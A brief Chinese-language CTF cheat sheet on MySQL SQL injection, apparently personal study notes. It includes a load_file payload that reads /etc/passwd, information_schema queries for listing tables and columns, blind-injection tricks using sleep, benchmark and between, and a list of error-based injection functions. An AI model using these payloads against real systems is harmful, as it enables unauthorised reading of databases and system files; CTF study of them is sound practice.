CTF SQLI

不畏将来,不念过往。如此,安好!

Someone famous 丰子恺

if((hex(load_file(0x2f6574632f706173737764)) like(0x25)),1,2)

获取表名

select TABLE_NAME,TABLE_TYPE,ENGINE,TABLE_ROWS,TABLE_COMMENT,CREATE_TIME,UPDATE_TIME, CHECK_TIME from information_schema.TABLES where TABLE_SCHEMA='databasename'

获取字段名

select COLUMN_NAME,DATA_TYPE,CHARACTER_MAXIMUM_LENGTH,IS_NULLABLE,COLUMN_COMMENT from information_schema.COLUMNS where TABLE_NAME='table_name' ;

mysql.innodb_table_stats 可代替 information_schema.tables

上面需要 mysql > 5.7  mysql 自带 mysql库


基于时间的盲注可使用的函数 sleep()  benchmark()

基于bool单字符比较  like ' c% '  between 'c' and chr(126)

between and 用在字符串比较时 会 一位一位的比较 ,按照ascii 大小, between and 提供了几位就比较几位/


基于语法错误猜解 (1/ASCII(SUBSTR(password,1))-97)

如果语法错误会引起差异 就可以用这用盲注


报错注入的 函数 floor()  extractvalue() updatexml() exp() GeometryCollection() polygon() multipoint() multilinestring() linestring() multipolygon() GTID_SUBTRACT()  gtid_subset

标签

注意!

Warning! 关注一下!